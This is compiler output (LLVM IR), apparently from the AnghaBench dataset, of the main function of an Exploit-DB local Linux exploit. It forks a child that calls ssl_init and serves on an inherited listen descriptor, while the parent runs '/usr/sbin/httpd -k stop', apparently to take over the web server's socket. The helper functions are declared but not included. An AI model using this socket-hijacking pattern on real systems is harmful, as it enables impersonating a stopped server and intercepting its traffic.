; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_23481.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/local/extr_23481.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@LISTEN_DESCRIPTOR = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [24 x i8] c"/usr/sbin/httpd -k stop\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %6 = call i64 (...) @fork()
  %7 = icmp eq i64 %6, 0
  br i1 %7, label %8, label %17

8:                                                ; preds = %2
  %9 = call i32 (...) @setsid()
  %10 = call i32 @sleep(i32 2)
  %11 = call i32 @close(i32 0)
  %12 = call i32 @close(i32 1)
  %13 = call i32 @close(i32 2)
  %14 = call i32 (...) @ssl_init()
  %15 = load i32, i32* @LISTEN_DESCRIPTOR, align 4
  %16 = call i32 @server_loop(i32 %15)
  br label %21

17:                                               ; preds = %2
  %18 = call i32 @sleep(i32 1)
  %19 = call i32 @system(i8* getelementptr inbounds ([24 x i8], [24 x i8]* @.str, i64 0, i64 0))
  %20 = call i32 @sleep(i32 1)
  br label %21

21:                                               ; preds = %17, %8
  ret i32 0
}

declare dso_local i64 @fork(...) #1

declare dso_local i32 @setsid(...) #1

declare dso_local i32 @sleep(i32) #1

declare dso_local i32 @close(i32) #1

declare dso_local i32 @ssl_init(...) #1

declare dso_local i32 @server_loop(i32) #1

declare dso_local i32 @system(i8*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
